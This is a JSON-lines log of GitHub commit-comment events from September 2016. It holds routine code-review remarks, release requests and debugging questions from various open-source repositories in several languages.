{"id":"4581567621","type":"CommitCommentEvent","actor":{"login":"raveit65"},"repo":{"name":"mate-desktop/mate-netbook"},"payload":{"comment":{"id":19074204,"position":null,"line":null,"path":null,"commit_id":"5fc95c71a4ade8d19f996586fe5750da66d2207e","created_at":"2016-09-19T06:25:25Z","updated_at":"2016-09-19T06:25:25Z","body":"@flexiondotorg @monsta \r\nCan you create the 1.16 tarball please. I don't use this package for fedora, in result i've no spec file and i can't test it."}},"created_at":"2016-09-19T06:25:25Z"}
{"id":"4581572914","type":"CommitCommentEvent","actor":{"login":"ShenMa"},"repo":{"name":"ShenMa/xxx-aboout-Erlang"},"payload":{"comment":{"id":19074213,"position":null,"line":null,"path":null,"commit_id":"cf2482886f529fc1eac515a3700edb0836e17865","created_at":"2016-09-19T06:27:38Z","updated_at":"2016-09-19T06:27:38Z","body":"领导需要将ejabberd 好好的xmpp 加一个json 协议的支持，也就是加一个协议网关的转换，很明显这会降低效率，但是非要这么做，领导嘛，你懂得……所以臣妾费了九牛二虎之力借用rfc4627 完成了转换，如果，你们也有这种蛋疼的需求，可以参考和改进下……"}},"created_at":"2016-09-19T06:27:38Z"}
{"id":"4581574091","type":"CommitCommentEvent","actor":{"login":"Atyaf-dhari"},"repo":{"name":"gkhandelwal/HoneyBeeLoadBalancer"},"payload":{"comment":{"id":19074214,"position":null,"line":null,"path":null,"commit_id":"65d04f0b8eaaa71ef353cc3c1c92f446b2069356","created_at":"2016-09-19T06:28:08Z","updated_at":"2016-09-19T06:28:08Z","body":"where can i find the hony bee algorithm and lottery in cloudsim, can any\none share it .\nthanks\n\n2016-09-14 5:47 GMT+03:00 Gaurav Khandelwal <notifications@github.com>:\n\n> It was a project and there is no paper for this project.\n>\n> On Fri, Sep 9, 2016 at 6:52 AM, Atyaf-dhari <notifications@github.com>\n> wrote:\n>\n> > Hello, please where can I get the paper of this project\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/gkhandelwal/HoneyBeeLoadBalancer/commit/\n> 65d04f0b8eaaa71ef353cc3c1c92f446b2069356#commitcomment-18961343>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AGOEbWYyY51Dvg7cxRqThR6STlLSg7Tgks5qoUhjgaJpZM4J4-FK>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gkhandelwal/HoneyBeeLoadBalancer/commit/65d04f0b8eaaa71ef353cc3c1c92f446b2069356#commitcomment-19012107>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASnADFcMATuMk5l-54ZYbM_RYerMfFGGks5qp2AqgaJpZM4J4-FK>\n> .\n>\n"}},"created_at":"2016-09-19T06:28:08Z"}
{"id":"4581576701","type":"CommitCommentEvent","actor":{"login":"MekaYangyi"},"repo":{"name":"lypro09539/leetcode"},"payload":{"comment":{"id":19074226,"position":null,"line":null,"path":null,"commit_id":"7c96cfed21ce22a8b9b7dd128b81b1c8537e01bf","created_at":"2016-09-19T06:29:11Z","updated_at":"2016-09-19T06:29:11Z","body":"效率有问题这种。"}},"created_at":"2016-09-19T06:29:11Z"}
{"id":"4581579004","type":"CommitCommentEvent","actor":{"login":"lizhong1008"},"repo":{"name":"lizhong1008/libyami-utils"},"payload":{"comment":{"id":19074236,"position":21,"line":125,"path":"tests/yamitranscode.cpp","commit_id":"43a09803ae976e3d1815a4867fc37e5f0804dce3","created_at":"2016-09-19T06:30:07Z","updated_at":"2016-09-19T06:30:07Z","body":"yes, agree. I will update it. "}},"created_at":"2016-09-19T06:30:07Z"}
{"id":"4581582386","type":"CommitCommentEvent","actor":{"login":"ihor-sviziev"},"repo":{"name":"ven-com/Magento-PageCache-powered-by-Varnish"},"payload":{"comment":{"id":19074248,"position":8,"line":194,"path":"app/code/community/Phoenix/VarnishCache/etc/default_3.0.vcl","commit_id":"b476250a35b5daf96c4b5287d6d7e0105d508e91","created_at":"2016-09-19T06:31:29Z","updated_at":"2016-09-19T06:31:29Z","body":"@andrey-legayev looks like you missed to remove this header in case when resp.http.X-Cache-Debug is not true."}},"created_at":"2016-09-19T06:31:29Z"}
{"id":"4581582928","type":"CommitCommentEvent","actor":{"login":"DahaiJarvis"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074251,"position":407,"line":407,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T06:31:42Z","updated_at":"2016-09-19T06:31:42Z","body":"restriction_flag，waveday_flag，day_flag等的判断值，最好还是写成常量维护起来，判断时根据常量判断，方便以后修改（restriction_flag 曾经因为物美更改了字段，我们也要跟着做修改）"}},"created_at":"2016-09-19T06:31:42Z"}
{"id":"4581583417","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-netbook"},"payload":{"comment":{"id":19074252,"position":null,"line":null,"path":null,"commit_id":"5fc95c71a4ade8d19f996586fe5750da66d2207e","created_at":"2016-09-19T06:31:55Z","updated_at":"2016-09-19T06:31:55Z","body":"Sure, I'll do it."}},"created_at":"2016-09-19T06:31:55Z"}
{"id":"4581583937","type":"CommitCommentEvent","actor":{"login":"svetlyak40wt"},"repo":{"name":"fukamachi/clack"},"payload":{"comment":{"id":19074253,"position":70,"line":70,"path":"src/contrib/middleware/postmodern.lisp","commit_id":"0fe573cf84cfa1eaf967bb306d31c4753242da07","created_at":"2016-09-19T06:32:08Z","updated_at":"2016-09-19T06:32:08Z","body":"Probably, here is error, and `:clack.postmodern.databases` should be used instead of `:databases`."}},"created_at":"2016-09-19T06:32:08Z"}
{"id":"4581584968","type":"CommitCommentEvent","actor":{"login":"dotnil"},"repo":{"name":"thx/kslite"},"payload":{"comment":{"id":19074254,"position":null,"line":null,"path":null,"commit_id":"4615296434b547e4bd1b445ec6d3551efb42fc2f","created_at":"2016-09-19T06:32:32Z","updated_at":"2016-09-19T06:32:32Z","body":"比较早期的一个模块加载器，类似 requirejs、seajs、或者 KISSY 的 loader"}},"created_at":"2016-09-19T06:32:32Z"}
{"id":"4581586349","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"grails/grails-core"},"payload":{"comment":{"id":19074258,"position":13,"line":13,"path":"grails-web-url-mappings/src/main/groovy/grails/web/mapping/cors/GrailsCorsConfiguration.groovy","commit_id":"6df0d71cb843ad510bc07d0fc89296f6c5137169","created_at":"2016-09-19T06:33:04Z","updated_at":"2016-09-19T06:33:04Z","body":"Maybe add `@CompileStatic` to improve performance of this"}},"created_at":"2016-09-19T06:33:04Z"}
{"id":"4581587639","type":"CommitCommentEvent","actor":{"login":"evolvedmicrobe"},"repo":{"name":"mlysy/msdeTest"},"payload":{"comment":{"id":19074259,"position":null,"line":null,"path":null,"commit_id":"9ad8fee216608b0429ed869bcb90ab91be79fb60","created_at":"2016-09-19T06:33:36Z","updated_at":"2016-09-19T06:33:36Z","body":"No, we should keep OOP, especially if speed is #1! We aren't going to really move the needle until we start doing parallel stuff, and although there are some OOP abstractions that can make code slower (constructors, destructors, virtual calls, etc.) we don't need to use any of them."}},"created_at":"2016-09-19T06:33:36Z"}
{"id":"4581588397","type":"CommitCommentEvent","actor":{"login":"khingblue"},"repo":{"name":"warrenfalk/protobuf"},"payload":{"comment":{"id":19074260,"position":null,"line":null,"path":null,"commit_id":"4a959f799f24bbd01cf823f7230bc2683537f621","created_at":"2016-09-19T06:33:53Z","updated_at":"2016-09-19T06:33:53Z","body":"Hi, I'm interested on this change.\r\n\r\nI tried running unit test against this commit, but the test hung at `check-TESTS` target:\r\n```\r\n$ make check\r\n...\r\nmake  check-TESTS\r\nmake[3]: Entering directory '/home/dq/protobuf/src'\r\nmake[4]: Entering directory '/home/dq/protobuf/src'\r\n```\r\n\r\nAny idea why this is happening?\r\n\r\nThanks."}},"created_at":"2016-09-19T06:33:53Z"}
{"id":"4581594486","type":"CommitCommentEvent","actor":{"login":"bjencks"},"repo":{"name":"Calrama/zfs"},"payload":{"comment":{"id":19074273,"position":7,"line":42,"path":"contrib/dracut/90zfs/module-setup.sh.in","commit_id":"e4cb5bc462c68bbc0b666b69d06d1e2f4dcb1f19","created_at":"2016-09-19T06:36:13Z","updated_at":"2016-09-19T06:36:13Z","body":"Consider `grep -F` so you don't interpret the dots as regex symbols."}},"created_at":"2016-09-19T06:36:13Z"}
{"id":"4581594638","type":"CommitCommentEvent","actor":{"login":"bjencks"},"repo":{"name":"Calrama/zfs"},"payload":{"comment":{"id":19074275,"position":null,"line":null,"path":null,"commit_id":"e4cb5bc462c68bbc0b666b69d06d1e2f4dcb1f19","created_at":"2016-09-19T06:36:16Z","updated_at":"2016-09-19T06:36:16Z","body":"Looks good, no errors and the image still includes libgcc_s.so.1."}},"created_at":"2016-09-19T06:36:16Z"}
{"id":"4581596003","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19074280,"position":null,"line":null,"path":null,"commit_id":"1cc28333c1c3d0a11dddf8fb81ade8eb42587ad1","created_at":"2016-09-19T06:36:52Z","updated_at":"2016-09-19T06:36:52Z","body":"#18 Add initial test"}},"created_at":"2016-09-19T06:36:52Z"}
{"id":"4581597638","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19074282,"position":null,"line":null,"path":null,"commit_id":"12efab4cb980ecddb6a95c6bc3829a16b54b2ba3","created_at":"2016-09-19T06:37:33Z","updated_at":"2016-09-19T06:37:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WsPjgFbu&#x2F;56-remove-last-commit-from-devel\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Remove last commit from devel</a>"}},"created_at":"2016-09-19T06:37:33Z"}
{"id":"4581599042","type":"CommitCommentEvent","actor":{"login":"ayesha-baig"},"repo":{"name":"ayesha-baig/api-integration"},"payload":{"comment":{"id":19074285,"position":null,"line":null,"path":null,"commit_id":"597150d451a523e9e12f4d61aa233630237417a5","created_at":"2016-09-19T06:38:07Z","updated_at":"2016-09-19T06:38:07Z","body":"@ziafazal "}},"created_at":"2016-09-19T06:38:07Z"}
{"id":"4581600060","type":"CommitCommentEvent","actor":{"login":"tailuis7"},"repo":{"name":"tailuis7/Test"},"payload":{"comment":{"id":19074286,"position":null,"line":null,"path":null,"commit_id":"5b2534aae4cfb3e03346f5fe2a471c0c0c0ca838","created_at":"2016-09-19T06:38:29Z","updated_at":"2016-09-19T06:38:29Z","body":"Edited commit - This is the second commit"}},"created_at":"2016-09-19T06:38:29Z"}
{"id":"4581600078","type":"CommitCommentEvent","actor":{"login":"ayesha-baig"},"repo":{"name":"ayesha-baig/api-integration"},"payload":{"comment":{"id":19074287,"position":null,"line":null,"path":null,"commit_id":"d3348e93cf93a9ac1d22152b9c712ca51750891e","created_at":"2016-09-19T06:38:30Z","updated_at":"2016-09-19T06:38:30Z","body":"@ziafazal"}},"created_at":"2016-09-19T06:38:30Z"}
{"id":"4581600377","type":"CommitCommentEvent","actor":{"login":"NoGRo"},"repo":{"name":"NoGRo/opensubtitles-api"},"payload":{"comment":{"id":19074289,"position":null,"line":null,"path":null,"commit_id":"be5ff1ee92303d0138e87f74b92d06c7e9baff49","created_at":"2016-09-19T06:38:37Z","updated_at":"2016-09-19T06:38:37Z","body":"the original version of the code given a score according to the method use by server to find the subtitle (Imdb, hash, tag) using one or the other.\r\nthis version takes advantage of the different subtitles found by the optimization query and compare all properties to build the score\r\n\r\n- parse input properties and subtitles, to normalize and make code clean\r\n- get the score, comparing all input properties with subtitles, regardless of how the server found it\r\n- Movie/Serie info\r\n - imdb: 5\r\n - SeasonEpisode: 2\r\n- hash or filesize are definitive for the version of the movie.\r\n - hash/Filesize: 8\r\n- otherwise I compare tags and fps.\r\n - tags: 7 Max\r\n - fps: 1\r\n- Rank: 3 or 2\r\n\r\nI know it's a big change in the search module, so I work on a branch, let me know if you need changes\r\n\r\nAnyway, now I will work to implement the functionality of auto upload subtitles in popcorn, can you recommend me some branch or repository in particular? should do it in butter or popcorn?\r\n"}},"created_at":"2016-09-19T06:38:37Z"}
{"id":"4581603089","type":"CommitCommentEvent","actor":{"login":"s40523210"},"repo":{"name":"s40523210/s40523210.github.io"},"payload":{"comment":{"id":19074291,"position":null,"line":null,"path":null,"commit_id":"5f6d415b4b12108c71fb800b0ebd758a698b7cee","created_at":"2016-09-19T06:39:44Z","updated_at":"2016-09-19T06:39:44Z","body":"s40523210"}},"created_at":"2016-09-19T06:39:44Z"}
{"id":"4581605715","type":"CommitCommentEvent","actor":{"login":"AchimTuran"},"repo":{"name":"AchimTuran/xbmc"},"payload":{"comment":{"id":19074299,"position":4,"line":44,"path":"project/cmake/scripts/common/AddonHelpers.cmake","commit_id":"8295db89387dcd643994798e7815b576215ceeee","created_at":"2016-09-19T06:40:44Z","updated_at":"2016-09-19T06:40:44Z","body":"@fetzerch @hudokkow\r\nI want to add source groups for our binary add-on projects. I tried to use the already existing macro [`source_group_by_folder(...)`](https://github.com/xbmc/xbmc/blob/master/project/cmake/scripts/common/Macros.cmake#L12), but I wasn't able to include that file in AddonHelpers.cmake.\r\nWhat is the best way to handle this?"}},"created_at":"2016-09-19T06:40:44Z"}
{"id":"4581612356","type":"CommitCommentEvent","actor":{"login":"DaveRandom"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":19074314,"position":31,"line":31,"path":"src/Chat/Client/Actions/Action.php","commit_id":"b9eb875e52bb124fa3bc39900ba40704dd4b5a2b","created_at":"2016-09-19T06:43:14Z","updated_at":"2016-09-19T06:43:14Z","body":"Any particular reason the promisor shouldn't be exposed here? It seems OK to me because this is an internal class that's mostly just a ball of state (`processResponse()` is basically just a callback and `getMaxAttempts()` would be a property if PHP had real properties).\r\n\r\nCould implement `Promisor` but every call would be forwarded, seems like a bit of a waste of time... I'm open to persuasion though."}},"created_at":"2016-09-19T06:43:14Z"}
{"id":"4581612527","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":19074316,"position":null,"line":null,"path":null,"commit_id":"191784433813dd098879f8218cb9a804f77d545e","created_at":"2016-09-19T06:43:18Z","updated_at":"2016-09-19T06:43:18Z","body":"This commit should probably go to upstream asap."}},"created_at":"2016-09-19T06:43:18Z"}
{"id":"4581612740","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19074317,"position":null,"line":null,"path":null,"commit_id":"06ec61da04d5fd1879fe50e940d310db626bd7a4","created_at":"2016-09-19T06:43:22Z","updated_at":"2016-09-19T06:43:22Z","body":"Build report #160953168 for sha 06ec61da04d5fd1879fe50e940d310db626bd7a4:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-19T06:43:22Z"}
{"id":"4581615840","type":"CommitCommentEvent","actor":{"login":"DaveRandom"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":19074321,"position":24,"line":24,"path":"src/Chat/Client/Actions/EditMessageAction.php","commit_id":"b9eb875e52bb124fa3bc39900ba40704dd4b5a2b","created_at":"2016-09-19T06:44:32Z","updated_at":"2016-09-19T06:44:32Z","body":"Agreed"}},"created_at":"2016-09-19T06:44:32Z"}
{"id":"4581618018","type":"CommitCommentEvent","actor":{"login":"hackiftekhar"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":19074323,"position":null,"line":null,"path":null,"commit_id":"440807dfcb2403d66bd48ffbe0bdccaba04e95f9","created_at":"2016-09-19T06:45:17Z","updated_at":"2016-09-19T06:45:17Z","body":"@rs10693 could you please elaborate, I didn't get you."}},"created_at":"2016-09-19T06:45:17Z"}
{"id":"4581619080","type":"CommitCommentEvent","actor":{"login":"boutros"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":19074328,"position":null,"line":null,"path":null,"commit_id":"bb829ddf1ec59e079af4c08d0501990ccd683599","created_at":"2016-09-19T06:45:40Z","updated_at":"2016-09-19T06:45:40Z","body":"Dette kan sikkert løses smartere - denne snutten som fornyer sesjonen og gjentar http requesten gjentas for alle rutene..."}},"created_at":"2016-09-19T06:45:40Z"}
{"id":"4581619667","type":"CommitCommentEvent","actor":{"login":"coelckers"},"repo":{"name":"rheit/zdoom"},"payload":{"comment":{"id":19074330,"position":null,"line":null,"path":null,"commit_id":"f1ba19073fce4af02298056b93bd78ff16313822","created_at":"2016-09-19T06:45:53Z","updated_at":"2016-09-19T06:45:53Z","body":"Sorry about that. I would have kept this but it was really giving me the creeps how it worked around all sane conventions how stuff should be done. If more come up, it may be necessary to map 'damage' to the new function - which would still be significantly cleaner than the old code...\r\n\r\nThe worst thing with it was that it did some check on the damage function pointer with hardcoded 32 bit access - I guess you can imaging what might have happened if the pointer just by coincidence ended up right on a page boundary. Yes, unlikely but not impossible...\r\n"}},"created_at":"2016-09-19T06:45:53Z"}
{"id":"4581622789","type":"CommitCommentEvent","actor":{"login":"rs10693"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":19074336,"position":null,"line":null,"path":null,"commit_id":"440807dfcb2403d66bd48ffbe0bdccaba04e95f9","created_at":"2016-09-19T06:47:01Z","updated_at":"2016-09-19T06:47:01Z","body":"I am installed your lib. but i get 510 error with new swift3 pod."}},"created_at":"2016-09-19T06:47:01Z"}
{"id":"4581623158","type":"CommitCommentEvent","actor":{"login":"xulu930113"},"repo":{"name":"xulu930113/miniMVC"},"payload":{"comment":{"id":19074338,"position":null,"line":null,"path":null,"commit_id":"677abd38b77c952c423cc96e7c21008faa77ef74","created_at":"2016-09-19T06:47:09Z","updated_at":"2016-09-19T06:47:09Z","body":"文件包"}},"created_at":"2016-09-19T06:47:09Z"}
{"id":"4581623428","type":"CommitCommentEvent","actor":{"login":"aik099"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19074339,"position":5,"line":739,"path":"CodeSniffer/CLI.php","commit_id":"4506689a25860bff1a262a81e2d873971adc77fc","created_at":"2016-09-19T06:47:15Z","updated_at":"2016-09-19T06:47:15Z","body":"Not sure if this is correct check for paths on Windows, where they start with drive letter (e.g. `C:\\`) when they are absolute."}},"created_at":"2016-09-19T06:47:15Z"}
{"id":"4581626594","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19074343,"position":null,"line":null,"path":null,"commit_id":"b352d0c4611ccc51eff0c643322e3bc3a9bb416f","created_at":"2016-09-19T06:48:17Z","updated_at":"2016-09-19T06:48:17Z","body":"With 256 instead of 16348 the situation is better, I measure\r\nonly a 0.8% slow-down (two parallel runs, of course, as usual):\r\n\r\nTotal time (ms) : 148699\r\nNodes searched  : 202696778\r\nNodes/second    : 1363134\r\nmaster\r\n\r\nTotal time (ms) : 149899\r\nNodes searched  : 202696778\r\nNodes/second    : 1352222\r\ntestedpatch\r\n"}},"created_at":"2016-09-19T06:48:17Z"}
{"id":"4581630960","type":"CommitCommentEvent","actor":{"login":"frechei"},"repo":{"name":"frechei/dashboard"},"payload":{"comment":{"id":19074347,"position":16,"line":199,"path":"config/locales/cn.yml","commit_id":"8c9c01615a9393e2a14c980bea7dcedaf10dc98f","created_at":"2016-09-19T06:49:52Z","updated_at":"2016-09-19T06:49:52Z","body":"试验一下评论。"}},"created_at":"2016-09-19T06:49:52Z"}
{"id":"4581632934","type":"CommitCommentEvent","actor":{"login":"steinaol"},"repo":{"name":"MUSIT-Norway/musit-frontend"},"payload":{"comment":{"id":19074350,"position":null,"line":null,"path":null,"commit_id":"e79249d2ae3b2055d90c7a3b2de75445fc2b41ed","created_at":"2016-09-19T06:50:34Z","updated_at":"2016-09-19T06:50:34Z","body":"Ser bra ut\r\n"}},"created_at":"2016-09-19T06:50:34Z"}
{"id":"4581632991","type":"CommitCommentEvent","actor":{"login":"pascalbros"},"repo":{"name":"vsouza/awesome-ios"},"payload":{"comment":{"id":19074351,"position":null,"line":null,"path":null,"commit_id":"1777d9aba130e64c1947ae8f759a28dd75648f61","created_at":"2016-09-19T06:50:34Z","updated_at":"2016-09-19T06:50:34Z","body":"That's cool! ;)\r\nCheers"}},"created_at":"2016-09-19T06:50:34Z"}
{"id":"4581635491","type":"CommitCommentEvent","actor":{"login":"ahdinosaur"},"repo":{"name":"ahdinosaur/vas"},"payload":{"comment":{"id":19074359,"position":null,"line":null,"path":null,"commit_id":"01a55064d5b29faabb5e76458561d785e1744961","created_at":"2016-09-19T06:51:29Z","updated_at":"2016-09-19T06:51:29Z","body":"@yoshuawuyts i may or may not have written a (pseudo) pull-stream-y replacement for `pull-http-client` (which uses `http` which uses node streams) using only `window.XHRHttpRequest` (not even `xhr`, yikes): [`pull-xhr`](https://github.com/ahdinosaur/pull-xhr). with this and [FormData](https://developer.mozilla.org/en/XMLHttpRequest/FormData) we can be free of node streams forever. :wink: "}},"created_at":"2016-09-19T06:51:29Z"}
{"id":"4581640231","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19074367,"position":10,"line":360,"path":"dashel/dashel-posix.cpp","commit_id":"3f4bd6db2046a08539cf996d1341260cc62b7fa4","created_at":"2016-09-19T06:53:13Z","updated_at":"2016-09-19T06:53:13Z","body":"Existing static functions start with a lowercase (see `getPorts()`)."}},"created_at":"2016-09-19T06:53:13Z"}
{"id":"4581641708","type":"CommitCommentEvent","actor":{"login":"frechei"},"repo":{"name":"frechei/dashboard"},"payload":{"comment":{"id":19074372,"position":16,"line":199,"path":"config/locales/cn.yml","commit_id":"8c9c01615a9393e2a14c980bea7dcedaf10dc98f","created_at":"2016-09-19T06:53:48Z","updated_at":"2016-09-19T06:53:48Z","body":"分到对冯绍分身乏术"}},"created_at":"2016-09-19T06:53:48Z"}
{"id":"4581643996","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19074375,"position":51,"line":55,"path":"src/transition/transitionHook.ts","commit_id":"bc87d9ecfa4307cc1f1cb8f7f777086d393c977b","created_at":"2016-09-19T06:54:39Z","updated_at":"2016-09-19T06:54:39Z","body":"This early exit was causing the check to `isSuperseded` to get skipped.\r\nResolves are implemented as a hook. when the resolve completed, the hook returns undefined (which means to continue processing the transition).\r\nSince resolve is the last hook before `onFinish`, there were no more checks for `isSuperseded`.\r\n\r\nThis commit makes all hook results always check `isSuperseded`"}},"created_at":"2016-09-19T06:54:39Z"}
{"id":"4581645082","type":"CommitCommentEvent","actor":{"login":"gzmkobe"},"repo":{"name":"geanders/countytimezones"},"payload":{"comment":{"id":19074380,"position":null,"line":null,"path":null,"commit_id":"dddcd4f7f10e8fb45bd056c81d5a653e843fece8","created_at":"2016-09-19T06:55:03Z","updated_at":"2016-09-19T06:55:03Z","body":"Actually, I wanted to commit on \"add_local_time.R\" file but not on this one "}},"created_at":"2016-09-19T06:55:03Z"}
{"id":"4581645145","type":"CommitCommentEvent","actor":{"login":"TiagoCardoso1983"},"repo":{"name":"jeremyevans/rodauth"},"payload":{"comment":{"id":19074382,"position":13,"line":11,"path":"CHANGELOG","commit_id":"2101cfc1b50ba60956feb77b2512ee1010585419","created_at":"2016-09-19T06:55:05Z","updated_at":"2016-09-19T06:55:05Z","body":"I think this option is too strict, as apparently it is extended to GET requests. Check this out:\r\n\r\n```\r\n*   Trying ::1...\r\n* Connected to localhost (::1) port 3000 (#0)\r\n> GET /api/trips HTTP/1.1\r\n> Host: localhost:3000\r\n> User-Agent: curl/7.43.0\r\n> Authorization: hash.forjwt\r\n> Accept: application/json\r\n> \r\n< HTTP/1.1 400 Bad Request\r\n< Content-Type: text/html\r\n< Content-Length: 37\r\n< \r\n* Connection #0 to host localhost left intact\r\nOnly JSON format requests are allowed\r\n```\r\n\r\nAs discussed last week, `Content-Type` header has too much power here. It should not matter for GET requests or POST requests with empty body. The `Accept` header should be all you need in this case, although one could argue, in json-only mode, there is only one possible response content-type (and by the way, check the `Content-Type` of my example: again text/html). \r\n\r\nTested against master. "}},"created_at":"2016-09-19T06:55:05Z"}
{"id":"4581646105","type":"CommitCommentEvent","actor":{"login":"MathieuAA"},"repo":{"name":"jhipster/jhipster-core"},"payload":{"comment":{"id":19074385,"position":null,"line":null,"path":null,"commit_id":"ab1472b3c53c6708c90ce0e6f4b2209ff274638e","created_at":"2016-09-19T06:55:25Z","updated_at":"2016-09-19T06:55:25Z","body":"Thanks! I didn't have time yesterday to do them."}},"created_at":"2016-09-19T06:55:25Z"}
{"id":"4581646635","type":"CommitCommentEvent","actor":{"login":"hackiftekhar"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":19074387,"position":null,"line":null,"path":null,"commit_id":"440807dfcb2403d66bd48ffbe0bdccaba04e95f9","created_at":"2016-09-19T06:55:37Z","updated_at":"2016-09-19T06:55:37Z","body":"4.0.6 is swift-3 version release. You probably may not using Xcode8, if you are using then make sure you set your swift-version to 3.0 in your build settings (USE LEGACY SWIFT LANGUAGE VERSION to NO)."}},"created_at":"2016-09-19T06:55:37Z"}
{"id":"4581646869","type":"CommitCommentEvent","actor":{"login":"zhixiongtan"},"repo":{"name":"btoueg/LCM-object-viewer"},"payload":{"comment":{"id":19074388,"position":null,"line":null,"path":null,"commit_id":"f5cb048f130d6c6d75c338c98a7120e3d7f4f778","created_at":"2016-09-19T06:55:42Z","updated_at":"2016-09-19T06:55:42Z","body":"thanks very much.  \r\nIf I may be so bold to inquire,  do you know someothers who is familiar with these codes?"}},"created_at":"2016-09-19T06:55:42Z"}
{"id":"4581648282","type":"CommitCommentEvent","actor":{"login":"kawashiro310"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074390,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T06:56:12Z","updated_at":"2016-09-19T06:56:12Z","body":"why did you delete all this file"}},"created_at":"2016-09-19T06:56:12Z"}
{"id":"4581650566","type":"CommitCommentEvent","actor":{"login":"rs10693"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":19074397,"position":null,"line":null,"path":null,"commit_id":"440807dfcb2403d66bd48ffbe0bdccaba04e95f9","created_at":"2016-09-19T06:56:56Z","updated_at":"2016-09-19T06:56:56Z","body":"ok Thanks."}},"created_at":"2016-09-19T06:56:56Z"}
{"id":"4581650968","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19074399,"position":68,"line":415,"path":"dashel/dashel-posix.cpp","commit_id":"3f4bd6db2046a08539cf996d1341260cc62b7fa4","created_at":"2016-09-19T06:57:05Z","updated_at":"2016-09-19T06:57:05Z","body":"Shouldn't the condition be `>=` to match the reverse `<` test?"}},"created_at":"2016-09-19T06:57:05Z"}
{"id":"4581651120","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19074400,"position":7,"line":768,"path":"drupal/sites/default/boinc/modules/boincwork/includes/boincwork.helpers.inc","commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-19T06:57:08Z","updated_at":"2016-09-19T06:57:08Z","body":"Thanks, but I was asking about the **format** change (only)."}},"created_at":"2016-09-19T06:57:08Z"}
{"id":"4581656558","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"swift-emacs/swift-mode"},"payload":{"comment":{"id":19074408,"position":null,"line":null,"path":null,"commit_id":"92119801203e2991543cbf943cc101673bd190bd","created_at":"2016-09-19T06:59:06Z","updated_at":"2016-09-19T06:59:06Z","body":"Was there ever a 2.1.1?"}},"created_at":"2016-09-19T06:59:06Z"}
{"id":"4581657074","type":"CommitCommentEvent","actor":{"login":"steinaol"},"repo":{"name":"MUSIT-Norway/musit-frontend"},"payload":{"comment":{"id":19074409,"position":5,"line":141,"path":"src/containers/magasin/grid/index.js","commit_id":"29ff642b74e33c986296bf5bb9deb6298123bf36","created_at":"2016-09-19T06:59:16Z","updated_at":"2016-09-19T06:59:16Z","body":"Lurer litt på bruken av hashHistory vs. this.props.history. Bør vi ikke være enhetlig i bruken av this.props.history/hasHistory?"}},"created_at":"2016-09-19T06:59:16Z"}
{"id":"4581657986","type":"CommitCommentEvent","actor":{"login":"jak103"},"repo":{"name":"jak103/jarvis"},"payload":{"comment":{"id":19074412,"position":32,"line":64,"path":"Jarvis/Grading/GradingResult.cs","commit_id":"2fb212d2ab2ab799b4a2fc660308856a40c4e23d","created_at":"2016-09-19T06:59:35Z","updated_at":"2016-09-19T06:59:35Z","body":"Dan has everything on Canvas as 10 points. Probably not the most elegant way to deal with it though... It was a dirty fix."}},"created_at":"2016-09-19T06:59:35Z"}
